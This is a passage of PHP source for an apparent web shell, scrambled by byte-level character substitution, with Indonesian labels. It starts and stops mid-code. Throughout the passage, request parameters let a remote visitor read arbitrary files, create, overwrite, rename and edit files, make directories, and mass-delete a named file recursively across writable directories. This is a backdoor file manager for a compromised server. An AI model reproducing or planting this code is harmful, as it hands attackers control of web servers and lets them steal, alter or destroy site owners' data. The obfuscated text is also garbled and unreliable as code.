r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'f\xebl\xfbb\xf5r\xe3')\xb5{\r\n\xfbc\xed\xe1\xb5\"\$_\xe6\";\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_POST['b\xebk\xebn'])){\r\n\t\$n\xf5m\xfb\xb5=\xb5\$_POST['n\xf5m\xf5_f\xebl\xfb'];\r\n\t\$\xeb\xe6\xeb_f\xebl\xfb\xb5=\xb5\$_POST['\xeb\xe6\xeb_f\xebl\xfb'];\r\n\tf\xe1r\xfb\xf5c\xed\xb5(\$n\xf5m\xfb\xb5\xf5\xe6\xb5\$n\xf5m\xf5_f\xebl\xfb){\r\n\t\t\$\xed\xf5n\xf1l\xfb\xb5=\xb5@f\xe1p\xfbn(\"\$n\xf5m\xf5_f\xebl\xfb\",\xb5\"w\");\r\n\t\t\xebf(\$\xeb\xe6\xeb_f\xebl\xfb){\r\n\t\t\t\$b\xe3\xf5\xea\xb5=\xb5@fwr\xeb\xea\xfb(\$\xed\xf5n\xf1l\xfb,\xb5\$\xeb\xe6\xeb_f\xebl\xfb);\r\n\t\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\t\$b\xe3\xf5\xea\xb5=\xb5\$\xed\xf5n\xf1l\xfb;\r\n\t\t}\r\n\t}\r\n\t\xebf(\$b\xe3\xf5\xea){\r\n\t\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>B\xe3\xf5\xea\xb5f\xebl\xfb</\xe6\xear\xe1ng>\xb5\xe1k!\xb5'.\xe1k().'</\xf1\xeb\xfd>';\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>B\xe3\xf5\xea\xb5f\xebl\xfb</\xe6\xear\xe1ng>\xb5g\xf5g\xf5l!\xb5'.\xfbr().'</\xf1\xeb\xfd>';\r\n\t\t}\r\n\t}\r\n\xfbc\xed\xe1\xb5\"\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1\xb5\xea\xfbx\xea-\xf1\xf5rk'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1-\xed\xfb\xf5\xf1\xfbr'>\r\n\t\t<kb\xf1>\$_x&nb\xe6p;B\xe3\xf5\xea\xb5f\xebl\xfb</kb\xf1>\r\n\t\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1='POST'>\r\n\t\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xebl\xfb-\xfb\xf5rm\xf5rk'></\xeb>\xb5N\xf5m\xf5\xb5f\xebl\xfb:\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5f\xe1rm-c\xe1n\xear\xe1l-\xe6m'\xb5\xeayp\xfb='\xea\xfbx\xea'\xb5n\xf5m\xfb='n\xf5m\xf5_f\xebl\xfb[]'\xb5pl\xf5c\xfb\xed\xe1l\xf1\xfbr='N\xf5m\xf5\xb5f\xebl\xfb'\xb5\$_r>\r\n\t\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xebl\xfb-\xfb\xf5rm\xf5rk'></\xeb>\xb5I\xe6\xeb\xb5f\xebl\xfb:\r\n\t\t\t<\xea\xfbx\xea\xf5r\xfb\xf5\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5f\xe1rm-c\xe1n\xear\xe1l-\xe6m'\xb5n\xf5m\xfb='\xeb\xe6\xeb_f\xebl\xfb'\xb5r\xe1w\xe6='7'\xb5pl\xf5c\xfb\xed\xe1l\xf1\xfbr='I\xe6\xeb\xb5f\xebl\xfb'\xb5\$_r\xb5></\xea\xfbx\xea\xf5r\xfb\xf5>\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xf1\xf5rk\xb5b\xean-\xe6m\xb5b\xean-bl\xe1ck'\xb5\xeayp\xfb='\xe6\xe3bm\xeb\xea'\xb5n\xf5m\xfb='b\xebk\xebn'\xb5\xfd\xf5l\xe3\xfb='b\xe3\xf5\xea'>\r\n\t\t</f\xe1rm>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<br>\";\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'\xf1\xebrb\xf5r\xe3'){\r\n\xfbc\xed\xe1\xb5\"\$_\xe6\";\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_POST['b\xe3\xf5\xea'])){\r\n\t\$n\xf5m\xf5\xb5=\xb5\$_POST['n\xf5m\xf5_\xf1\xebr'];\r\n\tf\xe1r\xfb\xf5c\xed\xb5(\$n\xf5m\xf5\xb5\xf5\xe6\xb5\$n\xf5m\xf5_\xf1\xebr){\r\n\t\t\$f\xe1l\xf1\xfbr\xb5=\xb5pr\xfbg_r\xfbpl\xf5c\xfb(\"([^\\w\\\xe6\\\xf1\\-_~,;:\\[\\]\\(\\].]|[\\.]{2,})\",\xb5'',\xb5\$n\xf5m\xf5_\xf1\xebr);\r\n\t\t\$f\xf1\xb5=\xb5@mk\xf1\xebr\xb5(\$f\xe1l\xf1\xfbr);\r\n\t}\r\n\t\xebf(\$f\xf1){\r\n\t\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>B\xe3\xf5\xea\xb5\xf1\xebr</\xe6\xear\xe1ng>\xb5\xe1k!\xb5'.\xe1k().'</\xf1\xeb\xfd>';\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>B\xe3\xf5\xea\xb5\xf1\xebr</\xe6\xear\xe1ng>\xb5g\xf5g\xf5l!\xb5'.\xfbr().'</\xf1\xeb\xfd>';\r\n\t\t}\r\n\t}\r\n\xfbc\xed\xe1\xb5\"\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1\xb5\xea\xfbx\xea-\xf1\xf5rk'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1-\xed\xfb\xf5\xf1\xfbr'>\r\n\t\t<kb\xf1>\$_x&nb\xe6p;B\xe3\xf5\xea\xb5\xf1\xebr</kb\xf1>\r\n\t\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1='POST'>\r\n\t\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xe1l\xf1\xfbr'></\xeb>\xb5N\xf5m\xf5\xb5\xf1\xebr:\r\n\t\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xebnp\xe3\xea-gr\xe1\xe3p\xb5mb-3'>\r\n\t\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5f\xe1rm-c\xe1n\xear\xe1l-\xe6m'\xb5\xeayp\xfb='\xea\xfbx\xea'\xb5n\xf5m\xfb='n\xf5m\xf5_\xf1\xebr[]'\xb5pl\xf5c\xfb\xed\xe1l\xf1\xfbr='N\xf5m\xf5\xb5\xf1\xebr'\xb5\$_r>\r\n\t\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xf1\xf5rk\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xe6\xe3bm\xeb\xea'\xb5n\xf5m\xfb='b\xe3\xf5\xea'\xb5\xfd\xf5l\xe3\xfb='b\xe3\xf5\xea'>\r\n\t\t\t</\xf1\xeb\xfd>\r\n\t\t</f\xe1rm>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<br>\";\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'\xf1\xfbl\xfb\xea\xfb'){\r\n\xfbc\xed\xe1\xb5\"\$_\xe6\";\r\nf\xe3nc\xea\xeb\xe1n\xb5\xed\xf5p\xe3\xe6_m\xf5\xe6\xe6\xf5l(\$\xf1\xebr,\$n\xf5m\xf5f\xebl\xfb)\xb5{\r\n\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\$\xf1\xebr))\xb5{\r\n\t\$\xf1\xebr\xf5\xb5=\xb5\xe6c\xf5n\xf1\xebr(\$\xf1\xebr);\r\n\tf\xe1r\xfb\xf5c\xed(\$\xf1\xebr\xf5\xb5\xf5\xe6\xb5\$\xf1\xebrb)\xb5{\r\n\t\t\$\xf1\xebrc\xb5=\xb5\"\$\xf1\xebr/\$\xf1\xebrb\";\r\n\t\t\$\xe2\x96\x9a\xb5=\xb5\$\xf1\xebrc.'/'.\$n\xf5m\xf5f\xebl\xfb;\r\n\t\t\xebf(\$\xf1\xebrb\xb5===\xb5'.')\xb5{\r\n\t\t\t\xebf(f\xebl\xfb_\xfbx\xeb\xe6\xea\xe6(\"\$\xf1\xebr/\$n\xf5m\xf5f\xebl\xfb\"))\xb5{\r\n\t\t\t\t\xe3nl\xebnk(\"\$\xf1\xebr/\$n\xf5m\xf5f\xebl\xfb\");\r\n\t\t\t}\r\n\t\t}\xb5\xfbl\xe6\xfb\xebf(\$\xf1\xebrb\xb5===\xb5'..')\xb5{\r\n\t\t\t\xebf(f\xebl\xfb_\xfbx\xeb\xe6\xea\xe6(\"\".\xf1\xebrn\xf5m\xfb(\$\xf1\xebr).\"/\$n\xf5m\xf5f\xebl\xfb\"))\xb5{\r\n\t\t\t\t\xe3nl\xebnk(\"\".\xf1\xebrn\xf5m\xfb(\$\xf1\xebr).\"/\$n\xf5m\xf5f\xebl\xfb\");\r\n\t\t\t}\r\n\t\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\t\xebf(\xeb\xe6_\xf1\xebr(\$\xf1\xebrc))\xb5{\r\n\t\t\t\t\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\$\xf1\xebrc))\xb5{\r\n\t\t\t\t\t\xebf(f\xebl\xfb_\xfbx\xeb\xe6\xea\xe6(\$\xe2\x96\x9a))\xb5{\r\n\t\t\t\t\t\t\xfbc\xed\xe1\xb5\"[<gr><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-c\xed\xfbck-\xf5ll'></\xeb></gr>]&nb\xe6p;\$\xe2\x96\x9a<br>\";\r\n\t\t\t\t\t\t\xe3nl\xebnk(\$\xe2\x96\x9a);\r\n\t\t\t\t\t\t\$\xe2\x96\x9f\xb5=\xb5\xed\xf5p\xe3\xe6_m\xf5\xe6\xe6\xf5l(\$\xf1\xebrc,\$n\xf5m\xf5f\xebl\xfb);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\xebf(\$_POST['\xe6\xea\xf5r\xea'])\xb5{\r\n\t\xed\xf5p\xe3\xe6_m\xf5\xe6\xe6\xf5l(\$_POST['\xf1_\xf1\xebr'],\xb5\$_POST['\xf1_f\xebl\xfb']);\r\n\t\xfbc\xed\xe1\xb5\"<br>\";\r\n}\r\n\xfbc\xed\xe1\xb5\"\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1\xb5\xea\xfbx\xea-\xf1\xf5rk'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1-\xed\xfb\xf5\xf1\xfbr'>\r\n\t\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1='POST'>\r\n\t\t<kb\xf1>\$_x&nb\xe6p;M\xf5\xe6\xe6\xb5\xf1\xfbl\xfb\xea\xfb</kb\xf1>\r\n\t\t<br>\r\n\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xe1l\xf1\xfbr'></\xeb>\xb5L\xe1k\xf5\xe6\xeb:\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xea\xfbx\xea'\xb5n\xf5m\xfb='\xf1_\xf1\xebr'\xb5\xfd\xf5l\xe3\xfb='\$\xf1\xebr'>\r\n\t\t\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xebl\xfb-\xfb\xf5rm\xf5rk'></\xeb>\xb5N\xf5m\xf5\xb5f\xebl\xfb:\r\n\t\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xebnp\xe3\xea-gr\xe1\xe3p\xb5mb-3'>\r\n\t\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xea\xfbx\xea'\xb5n\xf5m\xfb='\xf1_f\xebl\xfb'\xb5pl\xf5c\xfb\xed\xe1l\xf1\xfbr='n\xf5m\xf5\xb5f\xebl\xfb'\xb5\$_r><br>\r\n\t\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xebnp\xe3\xea-gr\xe1\xe3p-\xf5pp\xfbn\xf1'>\r\n\t\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xf1\xf5rk\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xe6\xe3bm\xeb\xea'\xb5n\xf5m\xfb='\xe6\xea\xf5r\xea'\xb5\xfd\xf5l\xe3\xfb='m\xf5\xe6\xe6\xb5\xf1\xfbl\xfb\xea\xfb'>\r\n\t\t\t</\xf1\xeb\xfd>\r\n\t\t</f\xe1rm>\r\n\t\t</\xf1\xeb\xfd>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<br>\";\r\n\t}\r\n}\r\n//\xb5\xf5k\xed\xebr\xb5\xea\xe1\xe1l\xe6\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_GET['f\xebl\xfb\xe6rc'])){\r\n\xfbc\xed\xe1\xb5\"<br><b>n\xf5m\xfb\xb5:\xb5</b>\".b\xf5\xe6\xfbn\xf5m\xfb(\$_GET['f\xebl\xfb\xe6rc']);\"</br>\";\r\n\xfbc\xed\xe1\xb5'<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\"\xe6\xed\xfbll\xb5pr\xfb\"\xb5\xeb\xf1=\"\xe6\xfb\xfb\"><pr\xfb\xb5\xe6\xeayl\xfb=\"f\xe1n\xea-\xe6\xebz\xfb:10px;\">'.\xed\xeaml\xe6p\xfbc\xeb\xf5lc\xed\xf5r\xe6(f\xebl\xfb_g\xfb\xea_c\xe1n\xea\xfbn\xea\xe6(\$_GET['f\xebl\xfb\xe6rc'])).'</pr\xfb></\xf1\xeb\xfd><br/>';\r\n}\xb5\xfbl\xe6\xfb\xebf(\xeb\xe6\xe6\xfb\xea(\$_GET['\xe1p\xea\xeb\xe1n'])\xb5&&\xb5\$_POST['\xe1p\xea']\xb5!=\xb5'\xf1\xfbl\xfb\xea\xfb'){\r\n\xfbc\xed\xe1\xb5'<br><b>n\xf5m\xfb\xb5:\xb5</b>'.b\xf5\xe6\xfbn\xf5m\xfb(\$_POST['p\xf5\xea\xed']);'</br>';\r\n//r\xfbn\xf5m\xfb\xb5f\xebl\xfb\r\n\xebf(\$_POST['\xe1p\xea']\xb5==\xb5'r\xfbn\xf5m\xfb'){\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_POST['n\xfbwn\xf5m\xfb'])){\r\n\xebf(r\xfbn\xf5m\xfb(\$_POST['p\xf5\xea\xed'],\$p\xf5\xea\xed.'/'.\$_POST['n\xfbwn\xf5m\xfb'])){\r\n\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>R\xfbn\xf5m\xfb</\xe6\xear\xe1ng>\xb5\xe1k!\xb5'.\xe1k().'</\xf1\xeb\xfd>';\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>R\xfbn\xf5m\xfb</\xe6\xear\xe1ng>\xb5g\xf5g\xf5l!\xb5'.\xfbr().'</\xf1\xeb\xfd>';\r\n}\r\n\$_POST['n\xf5m\xfb']\xb5=\xb5\$_POST['n\xfbwn\xf5m\xfb'];\r\n}\r\n\xfbc\xed\xe1\xb5'\r\n<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1=\"POST\">\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\"\xebnp\xe3\xea-gr\xe1\xe3p\xb5mb-3\">\r\n\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6=\"f\xe1rm-c\xe1n\xear\xe1l\xb5f\xe1rm-c\xe1n\xear\xe1l-\xe6m\"\xb5n\xf5m\xfb=\"n\xfbwn\xf5m\xfb\"\xb5\xeayp\xfb=\"\xea\xfbx\xea\"\xb5\xfd\xf5l\xe3\xfb=\"'.\$_POST['n\xf5m\xfb'].'\"\xb5/>\r\n\t\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\"\xed\xeb\xf1\xf1\xfbn\"\xb5n\xf5m\xfb=\"p\xf5\xea\xed\"\xb5\xfd\xf5l\xe3\xfb=\"'.\$_POST['p\xf5\xea\xed'].'\">\r\n\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\"\xed\xeb\xf1\xf1\xfbn\"\xb5n\xf5m\xfb=\"\xe1p\xea\"\xb5\xfd\xf5l\xe3\xfb=\"r\xfbn\xf5m\xfb\">\r\n\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6=\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\"\xb5\xeayp\xfb=\"\xe6\xe3bm\xeb\xea\"\xb5\xfd\xf5l\xe3\xfb=\"r\xfbn\xf5m\xfb\"/>\r\n\t</\xf1\xeb\xfd>\r\n</f\xe1rm>';\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_POST['\xe1p\xea']\xb5==\xb5'\xfb\xf1\xeb\xea'){\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_POST['\xe6rc'])){\r\n\$fp\xb5=\xb5f\xe1p\xfbn(\$_POST['p\xf5\xea\xed'],'w');\r\n\xebf(fwr\xeb\xea\xfb(\$fp,\$_POST['\xe6rc'])){\r\n\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>E\xf1\xeb\xea</\xe6\xear\xe1ng>\xb5\xe1k!\xb5'.\xe1k().'</\xf1\xeb\xfd>';\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>E\xf1\xeb\xea</\xe6\xear\xe1ng>\xb5g\xf5g\xf5l!\xb5'.\xfbr().'</\xf1\xeb\xfd>';\r\n}\r\nfcl\xe1\xe6\xfb(\$fp);\r\n}\r\n\xfbc\xed\xe1\xb5'\r\n<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1=\"POST\">\r\n\t<\xea\xfbx\xea\xf5r\xfb\xf5\xb5cl\xf5\xe6\xe6=\"f\xe1rm-c\xe1n\xear\xe1l\xb5f\xe1rm-c\xe1n\xear\xe1l-\xe6m\"\xb5r\xe1w\xe6=\"7\"\xb5n\xf5m\xfb=\"\xe6rc\">'.\xed\xeaml\xe6p\xfbc\xeb\xf5lc\xed\xf5r\xe6(f\xebl\xfb_g\xfb\xea_c\xe1n\xea\xfbn\xea\xe6(\$_POST['p\xf5\xea\xed'])).'</\xea\xfbx\xea\xf5r\xfb\xf5><br\xb5/>\r\n\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\"\xed\xeb\xf1\xf1\xfbn\"\xb5n\xf5m\xfb=\"p\xf5\xea\xed\"\xb5\xfd\xf5l\xe3\xfb=\"'.\$_POST['p\xf5\xea\xed'].'\">\r\n\t\t<\xebnp\xe3\xea\xb5\xeayp\xfb=\"\xed\xeb\xf1\xf1\xfbn\"\xb5n\xf5m\xfb=\"\xe1p\xea\"\xb5\xfd\xf5l\xe3\xfb=\"\xfb\xf1\xeb\xea\">\r\n\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6=\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\xb5b\xean-bl\xe1ck\"\xb5\xeayp\xfb=\"\xe6\xe3bm\xeb\xea\"\xb5\xfd\xf5l\xe3\xfb=\"\xfb\xf1\xeb\xea\"/>\r\n</f\xe1rm>\r\n<br>';\r\n\t}\r\n}\xb5\xfbl\xe6\xfb\xb5{\r\n//\xf1\xfbl\xfb\xea\xfb\xb5\xf1\xebr\xb5&\xb5f\xebl\xfb\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_GET['\xe1p\xea\xeb\xe1n'])\xb5&&\xb5\$_POST['\xe1p\xea']\xb5==\xb5'\xf1\xfbl\xfb\xea\xfb'){\r\n\xebf(\$_POST['\xeayp\xfb']\xb5==\xb5'\xf1\xebr'){\r\n\xebf(rm\xf1\xebr(\$_POST['p\xf5\xea\xed'])){\r\n\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>D\xfbl\xfb\xea\xfb\xb5\xf1\xebr</\xe6\xear\xe1ng>\xb5\xe1k!\xb5'.\xe1k().'</\xf1\xeb\xfd>';\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>D\xfbl\xfb\xea\xfb\xb5\xf1\xebr</\xe6\xear\xe1ng>\xb5g\xf5g\xf5l!\xb5'.\xfbr().'</\xf1\xeb\xfd>';\r\n\t}\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_POST['\xeayp\xfb']\xb5==\xb5'f\xebl\xfb'){\r\n\xebf(\xe3nl\xebnk(\$_POST['p\xf5\xea\xed'])){\r\n\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>D\xfbl\xfb\xea\xfb\xb5f\xebl\xfb</\xe6\xear\xe1ng>\xb5\xe1k!\xb5'.\xe1k().'</\xf1\xeb\xfd>';\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>D\xfbl\xfb\xea\xfb\xb5f\xebl\xfb</\xe6\xear\xe1ng>\xb5g\xf5g\xf5l!\xb5'.\xfbr().'</\xf1\xeb\xfd>';\r\n\t\t}\r\n\t}\r\n}\r\n\$\xe6c\xf5n\xf1\xebr\xb5=\xb5\xe6c\xf5n\xf1\xebr(\$p\xf5\xea\xed);\r\n\$p\xf5\xb5=\xb5g\xfb\xeacw\xf1();\r\n\xfbc\xed\xe1\xb5'<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\"\xea\xf5bl\xfb-r\xfb\xe6p\xe1n\xe6\xeb\xfd\xfb\">\r\n<\xea\xf5bl\xfb\xb5cl\xf5\xe6\xe6=\"\xea\xf5bl\xfb\xb5\xea\xf5bl\xfb-\xed\xe1\xfd\xfbr\xb5\xea\xf5bl\xfb-\xf1\xf5rk\xb5\xea\xfbx\xea-l\xebg\xed\xea\">\r\n<\xea\xed\xfb\xf5\xf1>\r\n<\xear>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-c\xfbn\xea\xfbr\">n\xf5m\xfb</\xea\xf1>\r\n\t\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-c\xfbn\xea\xfbr\">l\xf5\xe6\xea\xb5\xfb\xf1\xeb\xea</\xea\xf1>\r\n\t\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-c\xfbn\xea\xfbr\">\xe6\xebz\xfb</\xea\xf1>\r\n\t\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-c\xfbn\xea\xfbr\">\xe1wn\xfbr<gr>:</gr>\xf1\xe1wn\xfbr</\xea\xf1>\r\n\t\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-c\xfbn\xea\xfbr\">p\xfbrm\xeb\xe6\xe6\xeb\xe1n</\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-c\xfbn\xea\xfbr\">\xe1p\xea\xeb\xe1n\xe6</\xea\xf1>\r\n</\xear>\r\n</\xea\xed\xfb\xf5\xf1>\r\n<\xeab\xe1\xf1y\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-n\xe1wr\xf5p\">\r\n<\xear>\r\n\t<\xea\xf1><\xeb\xb5cl\xf5\xe6\xe6=\"b\xeb\xb5b\xeb-f\xe1l\xf1\xfbr2-\xe1p\xfbn\"></\xeb><\xf5\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-\xf1\xfbc\xe1r\xf5\xea\xeb\xe1n-n\xe1n\xfb\xb5\xea\xfbx\xea-\xe6\xfbc\xe1n\xf1\xf5ry\"\xb5\xedr\xfbf=\"?p\xf5\xea\xed='.\xf1\xebrn\xf5m\xfb(\$\xf1\xebr).'\">..</\xf5></\xea\xf1><\xea\xf1></\xea\xf1><\xea\xf1></\xea\xf1><\xea\xf1></\xea\xf1><\xea\xf1></\xea\xf1><\xea\xf1\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-c\xfbn\xea\xfbr\">\r\n\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\"b\xean-gr\xe1\xe3p\">\r\n\t\t\t<\xf5\xb5cl\xf5\xe6\xe6=\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\"\xb5\xedr\xfbf=\"?\xeb\xf1=f\xebl\xfbb\xf5r\xe3&p\xf5\xea\xed='.\$\xf1\xebr.'\"><\xeb\xb5cl\xf5\xe6\xe6=\"b\xeb\xb5b\xeb-f\xebl\xfb-\xfb\xf5rm\xf5rk-pl\xe3\xe6-f\xebll\"></\xeb></\xf5>\r\n\t\t\t<\xf5\xb5cl\xf5\xe6\xe6=\"b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m\"\xb5\xedr\xfbf=\"?\xeb\xf1=\xf1\xebrb\xf5r\xe3&p\xf5\xea\xed='.\$\xf1\xebr.'\"><\xeb\xb5cl\xf5\xe6\xe6=\"b\xeb\xb5b\xeb-f\xe1l\xf1\xfbr-pl\xe3\xe6\"></\xeb></\xf5>\r\n\t\t</\xf1\xeb\xfd>\r\n\t</\xea\xf1>\r\n</\xear>';\r\nf\xe1r\xfb\xf5c\xed(\$\xe6c\xf5n\xf1\xebr\xb5\xf5\xe6\xb5\$\xf1\xebr){\r\n\$\xf1\xea\xb5=\xb5\xf1\xf5\xea\xfb(\"Y-m-\xf1\xb5H:\xeb:\xe6\",\xb5f\xebl\xfbm\xea\xebm\xfb(\"\$p\xf5\xea\xed/\$\xf1\xebr\"));\r\n\t\xebf(f\xe3nc\xea\xeb\xe1n_\xfbx\xeb\xe6\xea\xe6('p\xe1\xe6\xebx_g\xfb\xeapw\xe3\xeb\xf1'))\xb5{\r\n\t\t\$\xf1\xe1wn\xfbr\xb5=\xb5@p\xe1\xe6\xebx_g\xfb\xeapw\xe3\xeb\xf1(f\xebl\xfb\xe1wn\xfbr(\"\$p\xf5\xea\xed/\$\xf1\xebr\"));\r\n\t\t\$\xf1\xe1wn\xfbr\xb5=\xb5\$\xf1\xe1wn\xfbr['n\xf5m\xfb'];\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\$\xf1\xe1wn\xfbr\xb5=\xb5f\xebl\xfb\xe1wn\xfbr(\"\$p\xf5\xea\xed/\$\xf1\xebr\");\r\n\t}\r\n\t\xebf(f\xe3nc\xea\xeb\xe1n_\xfbx\xeb\xe6\xea\xe6('p\xe1\xe6\xebx_g\xfb\xeagrg\xeb\xf1'))\xb5{\r\n\t\t\$\xf1grp\xb5=\xb5@p\xe1\xe6\xebx_g\xfb\xeagrg\xeb\xf1(f\xebl\xfbgr\xe1\xe3p(\"\$p\xf5\xea\xed/\$\xf1\xebr\"));\r\n\t\t\$\xf1grp\xb5=\xb5\$\xf1grp['n\xf5m\xfb'];\r\n\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\$\xf1grp\xb5=\xb5f\xebl\xfbgr\xe1\xe3p(\"\$p\xf5\xea\xed/\$\xf1\xebr\");\r\n\t}\r\n\xebf(!\xeb\xe6_\xf1\xebr(\"\$p\xf5\xea\xed/\$\xf1\xebr\")\xb5||\xb5\$\xf1\xebr\xb5==\xb5'.'\xb5||\xb5\$\xf1\xebr\xb5==\xb5'..')\xb5c\xe1n\xea\xebn\xe3\xfb;\r\n\xfbc\xed\xe1\xb5\"\r\n<\xear>\r\n\t<\xea\xf1><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xe1l\xf1\xfbr-f\xebll'></\xeb><\xf5\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-\xf1\xfbc\xe1r\xf5\xea\xeb\xe1n-n\xe1n\xfb\xb5\xea\xfbx\xea-\xe6\xfbc\xe1n\xf1\xf5ry'\xb5\xedr\xfbf=\\\"?p\xf5\xea\xed=\$p\xf5\xea\xed/\$\xf1\xebr\\\">\$\xf1\xebr</\xf5></\xea\xf1>\r\n\t<\xea\xf1\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\$\xf1\xea</\xea\xf1>\r\n\t<\xea\xf1\xb5